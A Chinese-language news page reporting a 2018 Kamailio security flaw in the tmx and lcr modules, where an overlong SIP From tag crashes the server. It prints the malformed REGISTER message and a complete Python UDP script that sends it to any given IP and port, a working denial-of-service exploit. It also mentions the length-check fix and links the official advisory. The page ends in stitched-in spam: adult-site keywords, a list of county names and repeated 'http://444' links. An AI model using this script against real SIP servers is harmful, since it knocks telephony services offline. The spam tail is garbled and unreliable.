• <strike id="fdgpu"><input id="fdgpu"></input></strike>
    <label id="fdgpu"></label>
    <s id="fdgpu"><code id="fdgpu"></code></s>

  • <label id="fdgpu"></label>
  • <span id="fdgpu"><u id="fdgpu"></u></span>

    <s id="fdgpu"><sub id="fdgpu"></sub></s>
    您當前的位置是:  首頁(yè) > 新聞 > 國內 >
     首頁(yè) > 新聞 > 國內 >

    爆kamailio 安全問(wèn)題影響tmx和lcr module模塊

    2018-03-21 11:08:59   作者:james.zhu   來(lái)源:Asterisk開(kāi)源派   評論:0  點(diǎn)擊:


      kamailio 版本4.4.5.0 和5.1模塊爆安全問(wèn)題,tmx模塊和lcr模塊可能收到影響。攻擊者可根據模塊漏洞通過(guò)tag 方式使用非法的branch或from tag對kamailio進(jìn)行攻擊,可導致kamalio崩潰。tmx 模塊負責對transaction management 進(jìn)行管理,LCR則負責是一個(gè)最低資費路由模塊。如果用戶(hù)沒(méi)有使用以上兩個(gè)模塊,則無(wú)影響,如果使用了以上兩個(gè)模塊,官方建議盡快升級到最新版本。
      以下是通過(guò)SIP tag 攻擊kamailio導致軟交換崩潰的消息:
    • REGISTER sip:localhost:5060 SIP/2.0
    • Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394
    • To: <sip:1@localhost:5060>
    • From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg
    • Call-ID: 8b113457-c6a6-456a-be68-606686d93c38
    • Contact: sip:1@127.0.0.1:53497
    • Max-Forwards: 70
    • CSeq: 10086 REGISTER
    • User-Agent: go SIP fuzzer/1
    • Content-Length: 0
      使用的Python 代碼攻擊方式如下,
      python crash.py <ip> <port>
      #!/usr/bin/env python
      import socket
      import sys
      PROTO = "udp"
      SERVER_IP = "127.0.0.1"
      SERVER_PORT = 5060
      for _ in range(2):
    • sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    • sock.connect((sys.argv[1], int(sys.argv[2])))
    • msg = "REGISTER sip:localhost:5060 SIP/2.0\r\n" \
    • "Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394\r\n" \
    • "To: <sip:1@localhost:5060>\r\n" \
    • "From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg\r\n" \
    • "Call-ID: 8b113457-c6a6-456a-be68-606686d93c38\r\n" \
    • "Contact: sip:1@127.0.0.1:53497\r\n" \
    • "Max-Forwards: 70\r\n" \
    • "CSeq: 10086 REGISTER\r\n" \
    • "User-Agent: go SIP fuzzer/1\r\n" \
    • "Content-Length: 0\r\n" \
    • "\r\n"
      sock.sendall(msg)
      具體補防漏洞的方式主要通過(guò)對 R-URI的字符串長(cháng)度進(jìn)行檢查。
      請查看官方網(wǎng)站的cfg配置:
      https://www.kamailio.org/w/2018/03/kamailio-security-announcement-tmx-lcr/
      關(guān)注微信公眾號:asterisk-cn,獲得有價(jià)值的行業(yè)分享
      開(kāi)源IPPBX論壇:www.ippbx.org.cn
      Asterisk, freepbx技術(shù)文檔: www.freepbx.org.cn
      融合通信商業(yè)解決方案首選產(chǎn)品:www.hiastar.com
    【免責聲明】本文僅代表作者本人觀(guān)點(diǎn),與CTI論壇無(wú)關(guān)。CTI論壇對文中陳述、觀(guān)點(diǎn)判斷保持中立,不對所包含內容的準確性、可靠性或完整性提供任何明示或暗示的保證。請讀者僅作參考,并請自行承擔全部責任。

    專(zhuān)題

    亚洲精品网站在线观看不卡无广告,国产a不卡片精品免费观看,欧美亚洲一区二区三区在线,国产一区二区三区日韩 宁波市| 嘉善县| 威远县| 沙坪坝区| 兰溪市| 津市市| 兖州市| 岳西县| 喜德县| 江达县| 云梦县| 新邵县| 泸定县| 蒙山县| 星子县| 略阳县| 文登市| 通海县| 马关县| 富宁县| 乃东县| 武功县| 土默特右旗| 道孚县| 乌拉特中旗| 枞阳县| 安图县| 绥化市| 旌德县| 韶关市| 昌乐县| 运城市| 财经| 云南省| 邓州市| 盘山县| 筠连县| 微山县| 子长县| 奇台县| 咸阳市| http://444 http://444 http://444 http://444 http://444 http://444